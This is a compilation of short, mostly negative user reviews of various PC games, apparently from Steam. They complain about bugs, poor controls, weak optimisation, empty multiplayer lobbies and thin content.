Positives:- Player and Staff database is extensiveA lot of youth players, attributes are quite clear how good a player is or will be- Lots of leaguesNegatives:- UI is not user friendly:Navigating through different pages and what actions can be done is not intuitive- Match engine:It's not very clear what's going on in the way of stats or info, quirks such as making a clean break with all defenders beaten and then making a pass to a player with a defender right on top of him, running towards the touch line in the goal area with no defenders around- Transfers:Not very realistic, a percentage needs to be met for the player to sign and is simply increased with more salary or contract duration with no consideration of which club the player is moving from and toOverall:So far it's not very enjoyable to play=============================================================================After playing a few more hours it does get slightly more enjoyble. The not so great interface has a learning curve to it, which is not somehting you really want for a sim manager.Better than PRM, but I wouldn't recommend it at its release price.
Wans't able to play this game the optimisation was very poor and didn't load in a basic resolution such as 1920*1080!
this game is kinda dead pls dont buy
This game has no redeeming qualities. The game is incredibly technically demanding despite being a platforming game with poor controls. Most of the levels don't utilize any kind of mechanics and just exist to waste your time. Long load times every time you die, and with lots of bugs and ledges it's very easy to do so. Story is nonexistent and the ending cutscene is not worth suffering through 20 levels.
I'm going to start by saying that this game is fun and I did not receive motion sickness while playing it.The motion controls are crap in the game though. They don't add anything to it except for horrible steering (which is done with the touchpad). They basically just use the motion controls as a controller and not for motion. They only have them in it so they can say they use motion controllers. You do not steer with the controllers, you use the track bad. For power ups and boost you also just press the touchpads. While the tracks are nice to look at, they are short and are basically just flat ground with nothing else. If you are looking for motion controlled mario kart then you are looking in the wrong place. Maybe with future updates they will make them better but I doubt it since this is not even a early release or alpha or beta.
No heart achievement in this one, I'm disappointed
This game was completely boring and has nothing in special about
Game is good, this version is not. Achievements, online and some of the interface is all borked. Fun when it works, which is rare. Avoid.
I suppose I'm not the target audience for this game.  I didn't particularly enjoy the puzzles or the message/story.Positives:A few of the puzzles are neat, I enjoyed the final set of puzzles and the monster puzzles.Negatives:Most of the puzzles are uninteresting.Controls are laggy.  Odd complaint for a puzzle game I know, but it results in inadvertant moves and since there's no undo you have to reset.Story was okay until the end, it seems to imply (end game spoiler) if you try hard enough you can overcome illness, and if you die it's because you just gave up, which I find rather distasteful.
I was disappointed by this game due to the way the story was laid out. There was  a surface mystery to solve, which happens mainly through interviewing people. It was a basic, straightforward murder mystery which the game spends 95% of the time on.[I'm sorry if the following is a spoiler, but I wish someone in the reviews had put something about this in them. I would not have played it if I knew. }But more intriguing is a deeper mystery which hints at a whole unknown world outside of the totalitarian world the character is a part of. The game barely opens up that world to you and that is it. The murder mystery is suddenly solved and the game is over. You never find out what the true nature of the Union is.  I thought maybe I did something wrong and didn't get the right ending, but I checked the walkthrough and this is how it goes. I did some checking and found there was supposed to be a sequel, in which I assume this sub-story plays out. Money ran out or something like that and the sequel was scrapped.  This game had potential but dragged on and on along the basic story line.  Also the game has you have almost daily meetings with your stupid shallow friend who you have to gossip with. The only interesting thing about that is that it builds the world's culture a little bit, which could have been done in one or two conversations.
The big problem here is the totally inappropriate (and partially broken) microtransaction monetization scheme left in the game.  The puzzles are OK, with some minor flaws.  The freedom to make mistakes then fix them without being immediately yelled at is good.
Very grindy, as with most cookie clickers. Nothing interesting. After playing for a day, won't open, freezes during loading.
worst game i have ever played
Well. It isn't something special just a puzzle.But the fact that the achievements are broke in this game, sucks. I feel no love in this game.
This game could use alot more work on it..
Login Bad
Fairly standard hidden object game, that took me about 2 and a half hours to complete. The hidden object aspect was fun, and not too easy, with a few pieces extremely well hidden. The addition of the 'comics' and voice acting was nice, however the story was a dull and predictable 'save and marry the damsel in distress' that could be set anywhere at any time. Historical accuracy is not a feature of this game.Personally, not recommended as there are other hidden object games on the market that are superior, despite this being a fun little distraction. It's not worth buying at full price, but as part of the Cradle Bundle - especially if said bundle is in a sale - it's a nice 'freebie'.
I keep getting stuck early on in the game, I'm trying to get a refund but steam support's page for it comes up blank.
Stats are misleading. With high sword fighting, I choose to use my sword to free my crew member from the giant but I fail because my swift stat is not high enough? With a high born leader stat I choose to get my crew to work together to shovel the sheep dung but I fail because my humility stat is low? With the Amazon queen, even tho I have high sword fighting, I fail because my strength stat isn't high enough? The scenarios and choices are what I would call landmines. While a choice may be worded as if it favors a certain stat build, you're thrown constant curve balls for having low stats in other areas that aren't even hinted at. Furthermore the game is built where you can really only build up 2 main stats in each area so it requires a lot of meta-gaming knowledge to succeed and that I can not abide.
Rather stylish, but boring to play.I like the graphics, but getting started with the game feels more like punishment than something I would do for fun.At best I could call it confusing. Also, every action you do in the game is overly slow, even if you just want to look at an item. The dialogues cannot be fast-forwarded. That is bad, people speak very slowly, a lot of the dialogue is not needed for the plot, and none of it is well written. I gave up after what felt like an hour; without any progress, or even any clue about what the game was about.
The drifting isn't real.
I started this game thinking that this would be a fun play and after 25 minutes ended up regretting this choice to even look for this game. Difficulty and lack of where to go makes it harder. You have limited resource yet the enemy is infinite. This game had potential, but it would seem devs gave up years ago. I sincerely recommend anything else because this game was a massive let down.
I dont know if this is a bug but i can only go to one signal becuase the rest are blocked by invisble walls and I get damaged from 2,305m every time there's nothing hiting me.
I waited anxiously for this games release, especially after it's predecessor (By no relation) Marble Blast Ultra for my xbox 360. However, upon start, I found it crashed when going full screen. My game recording softward (D3Dgear, Shadowplay) was unable to follow the process and crashed. I turned all recording software off, and the game consistently crashed. The graphics are great in game, but if you fall off a level the game hesitates. Watching my CPU, it took 90% for thirty-seven seconds before the level would reset. This was consistent. Turning the graphics up or down yielded no distinguishable difference. I was excited, now I'm not.NOT Recommended(M&lt;y specs, for Comparison. i7 4720hq, GTX 970m, 32gb 1600Mhz RAM)
Game had deleted my progress on first user after I made 2nd user, I was back to 1st level. Don't make new user if you are not willing to take risk of losing progress.
Now, that vn caught my attention at first, but that's about it. The premise was good, yet pretty bad handled, with abrupt, dull endings.
Multiplayer is dead, the points system is designed make you stop between 27000 and 28000, the game isn't even original, and compared to all the games which would be massively improved by being less boring than 1v1, this game becomes utter nonsense with more than two players since the winner is determined by who goes after the dumbest player.Got this for less than a dollar and it was still a waste of money.Wasn't going to even say anything but the designer comes off as desparate, begging for positive reviews in the game itself. You can't tell me what to do, your half-effort game gets the negative review it deserves.
:|That is my face throughout playing. I had high hopes at first, but the gameplay is repetitive, the creature sounds are repetitive, the quest is repetitive, everything is the same level to level. I thought I was still in tutorial, but apparently I wasn't...
Good game but  full of bugs  need to restart it 5-6 time to finish it  (game failed to acquire evidence)
no, no, no no no no no no, hell no, it's alright to start with, and then not too long after you getting into the game, there is this one stage that you just can not get pass, i dunno why is that , it pisses me off real bad.
It will NOT run full screen no matter what. Requested a refund. If it would run full screen, I might like it. I dodn't even play the game my run time in 1 minute, well I gues 5 minutes (now) just so I can leave this review? WTF? steam? and the expansion says 16 minutes but thats not right because it said running after I closed the game. I had to log off to force it to close, to keep it well under the 2 hour limit. I'm not even going to risk going any where near the 2 hours, I want my money back. I expected full screen, It is only playable in a window and that is not enjoyable or relaxing. I wouldn't waste the space on my harddrive if the game was free.
It's broken, At the end of the game i cannot get past the first dialogue box. I looked through the community hub and apparently this is not a new issue! Dissapointed about its broken-ness because other then that its fun to play! Get the game if you're okay with having some dissapointment along with your entertainment.
Looked like a super fun game, there is nothing wrong with it it is just that no one is in the lobbys so it is basically un playable but probably really fun in the past.
this game ♥♥♥♥♥♥♥ sucks
A game likes this lives and dies on its puzzles, since that's the only gameplay there is.Unfortunately, some of the puzzles don't make much sense. Even to a puzzlehead like me, the logic of what I was being presented, and the solution that I eventually had to Google... they just don't make sense some of the time.
Horrible controls, awful optimization, and headache inducing interface ; got my 2060 running hot, plain trash, not even free should you play this.
i keep reading about accurate physics.  still havent seen any.  i much prefer logging in fs19.  controls are a breeze and everything just works.  the grafics, even on ultra, are just not there for me.  i am going back to fs19 logging
You can have fun for an hour. But the game is not that great. Then again it's only 1€... Wait for it to be on sale anyway.Because having trouble just to put a turret when it's basically the first thing you have to do in this game, means the game is not worth it at full-price.
i bought this thinking it would be a bit of light arcade fun, but sadly it is too broken even for that - so i have had to refund it.the game window is tiny little box on the screen - the resolution seems fixed to this, regardless of what i set my desktop resolution to, and the controls are way too sensitive so that it is quickly a frustration inducing exercise.I am wondering whether the dev is not also aware of all this and is just laughing at any one silly enough to purchase it - in the game folder there is a config file which i went to hoping to tweak the settings but inside it it is just the repeated words "pepe head"
I love the Weather Lord series, and this game continues to feed my addiction! That said, I gave it a thumbs down because it felt like something was missing. A lot of levels had more resources than you needed to complete them, and some of them could be completed with a cheap shortcut. It seemed like some of them weren't fully fleshed out.
Zero out of Tem
A very interesting game. Seems to combine hidden object games with point-and-click adventures. Visually beautiful. The game has a bit of a Myst feel sometimes, especially with the lack of characters and the creepy ambience. Some of the hidden-object areas are a bit flawed, however. I was just in an area where there was a partially-torn box that turned out to need to be cut with a knife. There was a pair of shoes that needed laces that turned out to be the "boots" I needed. When I hovered my cursor over the letter, it said it couldn't be sent. I encountered a stamp. It seemed logical, so I brought it over and I got the same message. I clicked anyway and it worked. Another thing I don't like is the cursor for "this does not work" is two moving gears, something you would more associate with loading. I have also encountered some typos: "The letter is sticked to the wall". The voice acting, what little there is, is awful, but at least you don't have to talk to the characters that often. In one room I had to find the hand bell, but it wouldn't acknowledge that I had clicked on it unless I clicked on the handle, causing confusion. One thing I appreciate is that you can only make seven wrong clicks before you are prevented from clicking for five seconds, preventing you from rapidly clicking everywhere until you find everything. You can get disoriented sometimes due to the change of camera angles after you change location, such as when you go from the stockroom to the bridge: you press down. Pressing down again once you get to the bridge takes you back.
Doesn't work with the motion box (even though you can clearly see ppl play on it with one) Which makes it horrible without. Tried numerous times to reach out to the devs for help, but clearly they don't shi# as they just ignore all attempts to ask for help.
While the game itself is fun it sadly lacks players.I was unable to play any online matches for 3 days in a row, because there simply weren't any servers.
The puzzles for this puzzle game are too easy.The accidental ESC key press causes you to waste like 30 seconds.The "burning" tiles are very quiet and visually don't show it's effect, so I had to try-and-try to "feel" when they work, seems raw and a bit frustrating.Mines are useless. If you can remove them while playing the level without losing anything, why place them in the first place.
This game feels like a first attempt at making a game by someone who has no experience making a game before. It's slow, difficult to play, and It's riddled with bugs. The dialogue comes off as being juvenile in nature, so it's difficult to get into from that perspective as well. I wasn't able to play the game past the first hour or so; I found a bug that kept giving me reputation and once I hit 30k or so I somehow ended up walking around in space outside my ship with nowhere to go. At that point, I called it quits and requested a refund. A few examples of what I'm talking about:http://i.imgur.com/wbpgZWx.pnghttp://i.imgur.com/55tdVzf.pngThere are plenty of other games made with RPG Maker out there that are worth checking out, if that's your fancy, and I don't even know why anyone is calling this game a roguelike. Don't get me wrong, I think it's great that people are excited about making games and such, but this really should have been a private and free release on the dev's website as a hobby and not something commercially sold through Steam. And for ten bucks? You're out of your mind.
Cake Bash is fun for groups of friends. The controls are very simple and are easy to understand from game to game.Cake Bash's biggest downfall is that there is only 13 mini-games included (as of this post). So when you're playing "Get Tasty", if all you're playing is the same game over and over, then it can get a bit boring after awhile. I'm hoping that there will be more mini-games down the road.Now do I recommend this game? NOT as it currently sits.If we see more mini-games in future updates, I think this game has potential to be one of the best party games you can get on Steam.
(This is a DAY 1, EA first impressions)I honestly don't know what I expected from this game but the girl models looked great and it seemed like a decent plot dating sim game with some "adult time" mixed in.Unfortunately, any uncensored adult time can't be found here and I've read mixed information on whether the steam version will be getting such content. All that I know is that it will be coming to non-Steam versions of the game.In it's current state, I don't expect perfection but this was my take away...The Good - - The girls look great- Drifting in the SUV- The SUV can drive through water (lol)- You have an unlimited ammo pistol The Bad -- Performance issues across the board (1070, I5-5600K, 32 gigs of ram, game installed on SSD)   - Lag, stuttering, one time the game crashed on me,   - Some loading screens are too long   - Sometimes you can't access the pause menu or your phone   - Your memo tab in your phone doesn't update with each new "objective" every time or quick enough so you lose sight of what to do- Voice acting is done poorly ^^ And this is no offense to the actors themselves. I don't care if English might not be their first language or if they don't pronounce every word perfectly. The girls' accents are actually cute. Though, there are parts in the dialogue where they would fumble over a word or sentence so hard and it's like...they could of just redone the recording. Maybe this (and I hope) is something they'll address and have polished.- Graphics not as adjustable as I would like ?bloom?motion blur?- Game's direction seems unclear. You want to find where your brother went, handle a BnB, talk to and swindle women, then they give you a gun with what I assume was given to you to use for hunting?In it's current state, I can't recommend purchasing the game. I say wait for the full release, especially if you came looking for adult content. It's just not there, yet. I see the potential in this game, though. If they fix all the issues, voice acting, and give this Steam version some sexy time DLC? We'll have a solid game on our hands.
I do not recommend this in the current state. I have joined the first master of hardcore event with some friends but were not able to see each other. Currently there are only NPC's walking around like idiots, jumping and looking to walls...... Although it indicates that you are in a lobby with 30/50 people you only see NPC's which makes it really boring and not like what one does expect of this. 
This game crashed on me and has done the same for others I saw online when trying to fix the issue. I cant open it, I played 3 hours and now Im stuck with a bugged out game I cant play.
Fantastic idea executed poorly. It plays like a 2016 VR game with the lack of controls it has (expects you to turn 360 degrees.) All the screensavers are underwhelming to look at.Stay away if you use a Valve Index, it's "supported" but in the most bare-bones way.
Not a bad game but it doesn't have that spark that makes me want to play it.I've played hundreds of Flash games similar to the mini-games in Hexus and the vast majority have been better: relying on the Egyptian theme gets irritating after a while (especially in the 'Egyptian' Mahjong where I still don't know why sometimes colour matters and sometimes it doesn't).I find the main game tedious and far too easy (it's taken to about lv60 before I had to use any thought or powerups). You havea  little city to build and upgrade to produce the powerups for use in the main game but I'd maxed out all of them for about 30-40 lvs before I needed to touch them... which makes caring about the city very pointless. Equally being able to dress your avatar is equally pointless as the only time you ever see that avatar is on the 'dress' screen.Overall I'd say Hexus is a nice idea that nearly works but just doesn't quick click together. Might be worth picking up cheap in a sale but finding flash games on the internet is probably going to be more rewarding.
Rarely do I not enjoy a puzzle game, but Millie was a disapointment.  Essentially just a new take on Centipede, it is annoying more than anything else and when it gets difficult it feels like a matter of trial and error rather than actual puzzle solving or forward thinking. For what it is trying to be, Millie fails miserably, and doesn't succeed in any other catagory to boot.3/10
I should have listened to the other reviews.Just spent 10 minutes combing the desert for a suitable place to build my town.Not very fun or interesting.
Poorly programmed. Looks like all assets are from an asset store. ran into several glitches, the crafting system is broken (A isn't necessary past first necklace, take FOREVER to get miniscule benefits past that.Played the wizard class, then a bit of the knight. Nothing to see here, just go buy something else that might not suck so bad...
I have yet to finish the game but for now I just need to say that there is a special place in hell for whoever had the idea to remove the mouse controls.
The game play is repetitive and annoying. The mechanics are annoying and hyper simplistic. The controls are lacking. Everything added to the game beyond the first level detracts from game play rather than changing things up in an interesting way. All of the weapons function exactly the same but to different obstacles. Obstacles aren't interesting, just a nuisance. Switching weapons to clear them with the slow clunky controls and sitting with the weapon on the target for a few seconds makes them more annoying. Bombs are annoying, too many of them drop and they get in your way. If I could ignore them they would be fine but I need to clear them to draw through the tile. And that is infuriating. The tutorial is absolutely worthless and does not explain anything about the game. Something along the lines of hold a button to draw a line is missing. The limited solutions is bogus, I have seen at least one stage where you could leave empty tiles and still win, but they don't count because... Nice art style though.
Loud blaring music at the opening. Full of bugs. Laggy af. In my case I could even reach some of my seeds. Waste of money. wish I could get a refund
...
I only like this because there's a bunny with a cute waggly tail. Other than that, this sucks. Another fullscreen game where the mouse is not constrained to the window/monitor. So yeah, have fun moving the camera and tabbing yourself out.Also controls are not clearly listed ingame, only in the Unity launcher. Yay. Music is meh, animations of dancing on main menu has random jerkiness that returns the model to the origin point.Needs some serious work.
The menu barely works, have to spam click until it registers.The drums don't feel synced to the music.
This game has very great potential and I love the way it's programmed. It has a very simple design, focusing only on the typing with no superfluous graphic distractions. The amount of modes is nice, and provides variety for those who want a simple game to play, and it also offers multiplayer options with people online. I personally play the Stream Mode, as it lets you know your WPM (since I purchased the game to help me type faster). HOWEVER. At the time of this review, I am VERY disappointed in the word choices: fake words, misspelled words, Roman numerals, acronyms, unnecessary apostrophes, proper nouns that aren't capitalized, and way too many words about reproductive organs. I'm not sure if users are the ones who contribute to the word lists, but since you have to be online to play this game anyway, I think it would be better if the game just pulled words from an online dictionary instead.
didnt realise is a stupid episode game
Bad
Not worth the money
Hopefully Steam will give better coupons than this...
Don't get me wrong, I like the game, and I do see its potential, but it's basically abandoned. If you look at the news, the last ACTUAL update was in December 2019. In november, they posted a survey to know what we wanted more of. A survey only available for 6 days! And nothing since!The game has game breaking bugs, lots of problems that can only be resolved by several restart of the game, and could use some very simple quality of life features, such as assigning a computer to someone specific, or having multiple tvs and multiple times the same console to be able to do multiple videos on the same platform. Instead, everyone has to wait their turn. Sometimes you won't be able to give commands to either yourself or an employee. What can you do? Save, close the game, and hope it fixed itself. Otherwise, do it again.What do we get instead of bug fixes? Cosmetic items. Temporary cosmetic items. And this has been going on for over a year. With the price tag attached to this title, you'd expect a lot more.
Dialogue is incredibly slow, with even small bits like "Kenneth smiled" being given their own screen and accompanying, and lengthy, fade to black transition. That, in conjunction with the black and white, the music, and the fairly static imagery creates a feeling of intense sleepiness.
The game is broken, don't buy as is. items required to complete quests are not visible or are totally missing.
The game has interesting flair. However, until you find out how to play the units properly, you will have a very hard and very random time. It can be very frustrating then.Also review or Die? These two things are why I downvote the game.Otherwise this game has really a lot of flavor, which makes be come back to it.I would love to give it a neutral review, but since it is really frustrating if the RNG gods are not in your favor, I give it a thumbs down. On gameplay level it requires you to experiment for force composition and randomly find out what works well and what not. Same for advantages and abilities you will gain throughout your campaigns.
♥♥♥♥ instructions ♥♥♥♥ controls ♥♥♥♥ game
This game had little story, no introduction, and terrible controls. Looks cute, but don't be deceived.
After realizing this was a unity game everything basically made sense to me.I'll keep this pretty simple:Pros:-VR tracking works fine even though it should because its extremely barebones. (grabbing photos and the camera can feel awkward at times)-For a basic stage with basic props, they know how to use particle systems to take your attention away from the dull stages.Con:-Girls use same copy-paste full body, which has nipples inside the mesh under the clothes for whichever reason which I saw no real use for even being textured.-The walking animation could've possibly had more keyframes and positioning to be smoother.-Animations some girls do when they approach the table last a fraction of a second, while ones after picking a number are much longer. They also just stand there after the 0.1 second animation pose and look so lifeless.-Some girls don't blink,nor have dynamic bones in hair or breasts which compared to others just seems odd or unfinished. Even if model is intended not to have much movement in the breasts could've just set more stifness or inert for lesser movements. Others have ther shapekeys or mesh for their eye blink not where their eyes are, which was very distracting.-When stages phase in/out the model's eyes in the dance cubes or at the end of the game cycle stay there staring at you.-Arisa's ears dissapear in the 3rd stage.Overall, not reccomended.
Bad game. The car drift to much and can glitch throught walls.
"As we love music, wanted to make a game that gives an insight into how music is created"After reading this, I thought it would be a very interesting game that sought to be educational. However, after completing the first 10 levels, I found it was little more than placing the appropriate samples ino the correct places. When you place them wrongly, it simply tells you that something is wrong and you have to go back, find it and fix it. There's no idication of why what you did was wrong musically, in terms of harmony or scales or chords. There's no tuition. And so I don't think they achieved what they wanted in this game.
I did not enjoy the controls for this game.
BROKEN! Does not work at all! Well past minimum specs and this wreck wont get past the first screen No input is recognized or acknowledged... I should say, NO input registers. I can click around on the different language buttons on the first screen, but no selection registers in the app. No help on the website, not even a mention of a VR version. Refunded!UPDATE!Does NOT work at all with Index controllers. I turned on a vive controller and was able to get in the program. It is rather clunky, basic and situational conversation oriented.  It starts on a train where you exchange pleasantries with the only other passenger, until the ticket agent asks for your ticket and leaves.  The voice pickup is not very accurate and there was no voice trainer to improve the accuracy. After several tries to get basic words and phrases correct, I gave up.  However, it does accept obviously wrong input to progress the conversation as it shows what it thinks you said and kept going anyway.  This program would be great if it was approached in a classroom style rather than complete immersion. The immersion is not very realistic and the dialog is canned with preset responses.  It would be great if it had an Alexa (Google) or even Bixby (Galaxy) type of input so that you could actually have more of a conversation with it.  The format, as is, takes you too fast into a conversation in a non-native language. I feels much more exploratory than educational.
great game BUT(and it is a big BUT) my partner thinks i have purchase the testgame.Before the game starts i get a advertisement fore other games from the same creator,  and in the middle of the game i have got the question(pop up,inbetween levels ) if i like the game.I have to rate it.And this for a collectors item.So,even the fact that i like the game,i have to review it negativly(sorry for my english)
NOT RELAXING: You have a white dot center of the screen at all times.The cave is dark and you feel confined.Often the music ends and you have to navigate to the music.Often you reach the sides and the screen flips around to center you.The cave itself is dull and needs color, dripping water, anything besides grey.This needs dancing light not just moving white dots. Colors don't change or move. You just travel through a grey cave to a few colored areas that all rotate clockwise. I grew tired of traveling from the purple area to the blue area to then what, I guess travel to the yellow again. I care not for the $3 spent but I did want to relax. This did not relax me.
This is terrible. It's nearly impossible to control the ball, it glitches. I don't recommend.
There is much promise but can not recommend to buy at this state.TLDR; It's several major updates away from a polished product.From the screenshots this looks a lot like Satisfactory but it plays like a child of Genschin Impact and Valheim only movement, combat and building is all over the place mostly rough and janky. There's no natural progression like in Valheim, it's much like they dropped some ressources randomly like copper, iron, cows and sheep in the world, then designed crafts and worktables around it then build a mission system around it. It feels artificial with generic fantasy random monsters.There's no art direction like in Genshin Impact and the game doesn't actually look as good as in the screenshots. As someone mentioned they look like randomly collected assets. The characters look somewhat pretty.Explanations are lacking like how would I craft an "ancient" sword with the ancient iron or which slope for the quest?The translation seems not exactly top notch, the menus are badly structured and the controls aren't thought through.The dungeons are very basic and linear. Same can be said for fishing and farming and building. Is there a way to flatten the terrain because I couldn't see it.It's very ambitious but low budget and I'd rather play modded Minecraft.
*** Cannot "press to start" ***Started the game with 2 controllers plugged in (both working in Big Picture). Cannot "press to start" with the controllers. Cannot press enter to start on laptop keyboard or wireless keyboard. Cannot quit. Tried launching the game with mouse instead; same result. Completely unusable. (OS: MacOS Mojave)
Даб даб даб даб не ну тупо бан за такую реализациюПидрила игру почини
Didn't like the game, thought it would be more fun
TL;DR: I paid 50 cent for a burrito badge, some digital douchebaggery, and 21/22 achievements. If you don't care about any of these then save your money and sanity.I bought this game for the burrito badge and novelty comic relief. The game delivers on both of these and is easily completed so I have to recommend, I feel. If you want to 100% this, however, you may spend hours in the harder difficulties as your success is based largely on luck of consumables spawning and having the braindead ai actually manage to "leave" the room after being... um... "feared." You will likely rage as even runs that appear successful are thwarted by poor coding and design.Totally worth 50 cents.
Repetitive and bs achievements &lt;/3
"CONTROLLER REQUIRED"but doesnt really have Full controller support, mine (off-brand wired switch controller) doesn't work with it. Steam controller config doesn't seem to help at all.
Minesweeper had only one major flaw: it often came down to a 50/50 guess in the final move. This is a key issue that must be addressed by any true successor to the game. Unfortunately, Tilesweeper tries to address it, but not only falls short but makes it even worse.Tilesweeper attempts to solve the late-game guessing problem by allowing you to win by flagging all mines, essentially letting you guess wrong at the end without it being fatal. This is a great and needed addition to the game, and if left at that it would be well worth the $5 price tag and more, even without all the aesthetic improvements. However, while Tilesweeper does remove end game guessing, it adds it all throughout the beginning and middle of the game itself.Due to the irregular layout of the boards, random guess moves become normal routine. This is acceptable in Easy and Average modes where you have a reasonable chance of a cascading move that will open up new logical moves, but it becomes quite ridiculous in Hard mode where there are so many mines crammed into tiny corridors and corners that most games will be logically unsolvable without an absolutely absurd amount of successful guesses. We're talking multiple guess moves a minute with a ~20% or greater chance of the tile being mined. That is not an exaggeration. I have been playing Minesweeper for about 20 years now and was excited to see Tilesweeper pop up in my discovery queue. I really wanted to like this, but it's just not the same. Minesweeper was a game of skill, where Tilesweeper - at least in the upper levels of Hard mode - is a game of pure chance. If you are a Minesweeper fan, I cannot recommend this one. If what you liked about Minesweeper was the end-game guessing game, then I recommend you buy 5 scratch off tickets instead.
This is the first time I have become deeply disappointed about a game I thought it will be good, despite the great visuals it has. The story is not very interesting and short for every character, the gameplay is boring, so overall it doesn't deserve your time nor your money. But if you want to waste your time clicking on plants for more than +15 hours, then maybe this game for you. I just hope that they change the title of the game to "Forget me please", cause this game makes sure to make you forget it.
It's an unfinished game. It's buggy. It performs poorly. The sounds don't sync up with the car. There is no elapsed timer and scoreboard (play the game and you'll immediately understand that this game is incomplete without this feature). There are no settings options to adjust key bindings, video settings or audio settings. The process of escaping from a game is strange, slow and unpredictable. Windows Firewall reported it was attempting to use networking features even though the game has no multiplayer features at all (worrying).Despite saying all that, if the developers mark this game as early access (which would be a more honest way to advertise it) and they fix the issues I described above, this could actually be a really nice little indie game. It was somewhat satisfying controlling the car on the course and I think it has good potential. However good, potential does not a game, make. I'm refunding it for now, but maybe I'll check back on it in the future to see if they've sorted it out.
The controls do not feel responsive, pure rubbish, they need a complete overhaul by the creators, the graphics and the sound are not bad.
Bad controller support. Very limited gamemodes. Overall, not worth a dollar.
Another forgettable top down slaughterfest with hoardes of copypasta enemies tossed your way throughout the game. Don't waste your time and money buying this snorezville of a game. Even as the best in the trilogy, it doesn't warrant taking up even a second of mine or anyone else's time.
game kinda sucksthere is no contentoof
no help on needed changes (like clean tank and how the heck to actually open a node).   Otherwise a nice little timekiller.
well its what it says on the tin i guess.   you spawn a bunch of boats in the water then click play, and very laggly they boringly shoot each other untill one side is all dead.     takes about 60 seconds with lag.dont buy this
Just overall, not a very good game. It feels cheap, even though you're paying 20 dollars, and it just doesn't have a good feel to it. Sometimes it missed notes, even when I clearly see my drumstick hitting the drum. It also gives no instructions on how to create your own songs, or customize other parts of the game. Overall, it just sucks. Would not recommend paying 20 bucks for this.
BlessingWaste of time
Games take sometimes as little as 30 seconds, lobbies are always in short number, and mic spamming ruins the in game communication.
ERROR:   the following components are required to run this program : Microsot visual C++ 2015 after instalation is the same error
Can i have my money back? will never use this.
This game will not play. I keep getting a message about windows has a problem. Not cool when I wanted to play baccarat and black jack.
Wow this is beyond basic as far as the early access games out there. The map is tiny. You can't stealth anywhere because the only form of locomotion is teleportation. The soldiers hitboxes make no sense. Parrying feels ok but handling swords are buggy overall. They seem to lag and and clip on random things. You should have only one grip/release button having both makes dropping your weapon mid swing entirely more likely. Even for 8 dollars i feel right now there isnt even that amount of gameplay.I will keep my eyes on it as it develops but this is not what i expected seeing the trailer and images i thought the map was bigger and stealth played a bigger factor. You can't even distract enemies with bottles.
Got bored with first 5 mins.
A basic release of some enjoyable games.A small download (5MB) with a functional layout and it is easy to select the games.  No native controller support, no options to play the games full screen or to change resolution, no option to play two player games.  This package has been available to buy online for a couple of years.You can save and load states (one per game), and speed up the emulation speed should you want to.  The 'rewind' feature does not seem to work properly.Are the games  fun?  On the whole, yes: many of them are classics.  Most games only require the arrow keys and Z or X, but some require the use of the number pad (keys 1-0 here) which can be awkward to use  efficiently in arcade style games.Is this worth £15/$20?  If you like retro games, perhaps.  The package is merely functional and has no extras apart from simple game instructions and cover art.  The games run just fine but were designed to be played with a ColecoVision controller.  It is a shame the developers did not create a newer version of this with more features and the additional games they added to the ColecoVision Flashback console they released in North America.If this had a similar polish that Atari Vault has (online play, ability to use a controller, achievements, etc), I would recommend this at the current price.  As things stand, this is a nice mixture of games in merely functional package with none of the extras and options you might expect in 2016.  Probably worth waiting to buy in a sale, unless you really need to play this right now.
A game that is frustratingly clunky. Broken english, bad movement like jumping stopping you right in your tracks, somehow way too tutorialised and not enough (in regards to monster behaviour). It is almost charming at first, with a constant stream of achievements and russians that are clearly not voice actors speaking english, but the charm soon fades and you're left with a bad game.Also the parallax scrolling is nausea-inducing.
Game does not work.
These need.some servers.some playaers.some bots (AI)some new weaponssome new skinssome new game
its really boring tho we the people need intertanment
A game without a story without being able to change the resolution as you wish and without being able to make even a snapshot in a nutshell a bad game
This is phone/tablet game that has been ported to PC, and you can tell. Clunky controls, stuttering, glitchy and horribly optimized for what you get.I can't even give a fair review of the game or puzzles themselves, because I can barely play it.
The video they show is misleading; there are a few mascots that you choose from, and thats it. You cannot make your own charecters. There are no 2D mascots like in the video, and there are no guides or tutorials given by the developers on how to create or add mascots through file directory.However, it is only 2$, so its still worth its value, but the video is misleading.
this game flickerd during  play time.
This game is a ♥♥♥♥, dev dont update and dont work on it. game is still unplayable, cant load savegame, lagging as hell on every shot fired. quest dont stay completed, inventory dont stay on load(if you can load you game) etc...DONT BUY THIS ♥♥♥♥
I got a -90% coupon for this game, so it only costs me $0.20, and I still think it was a waste of money .
This game has a HUGE selection of card games.  But that's it.  There is nothing special about this collection.  And they all need a lot of work.  There are tons of options missing.  And a lot of the games have missing rules.  The developer needs to play a few other card game collections to see what I mean.  (Not too many on Steam to take example from.  Might want to look at some well developed mobile games, like Card Shark Collection on iOS or Android for example.)There is no UNDO option in the solitaire games.No option to turn off auto-flipping the cards.No option to see the discard spread.  (Can only see top card.  Klondike deal-3 for example deals 3 cards. but you can't see the 2 underneath.)Some games are missing the ability to take the discard pile, flip it back over, and go thru it again.  (Klondike seems to be the only one that allows you to do this.  Pyramid and Spider are missing this, probably more.)Some games are bugged like Pyramid.  (I went to drop a Jack on a 2 to remove it from the pile and it simply removed the Jack.  Then I went to drop a 9 on a 4 and for some reason it took the 6 next to it.  9+6 does not =13.)But the most important thing that is missing.  Deal animations.  The cards simply change instantly.  You can't see them moving into position.  Which can lead to confusion sometimes as to what happened.  [Deal animations have been standard in card games for at least 15 years.  Not sure why that was left out.  It a big one.]
actually just a worse version of The Witnesspuzzles tend to just get larger and more complex without getting more interestingnew mechanics add little variation to how puzzles should be approached. as a result, puzzles feel very sameymany annoying quality of life things. why can I rewind but not move in focus mode? why is "sprinting" so slow? why is focus mode toggled per bot? why isn't there a terminal in every room, or a portable terminal? why does it take 5 seconds to open the terminal? why can't I rewind in the terminal? why is scrolling in the terminal so slow?story was alright
Wasting money to buy this one. unbalance price and quality
Bought the game, because of a review in Gameplay describing the game as decent. Seems like they gave bonus points because it's from a local studio. I intended to finish the game despite my disinterest, but the save game seems to be lost after a PC migration. I can't arsed to slouch through the poorly planned forced stealth missions and deal with the clunky and unresponsive controls one more time, just to be subjected to the same hamfisted story portraying Frisian men as amazing and everyone else as either victims, punchlines of jokes (the women) or mindless enemies (everyone else). Can't recommend this game to anyone, but I do sincerely hope the studio will be able to make more games and learn from their work on this one.
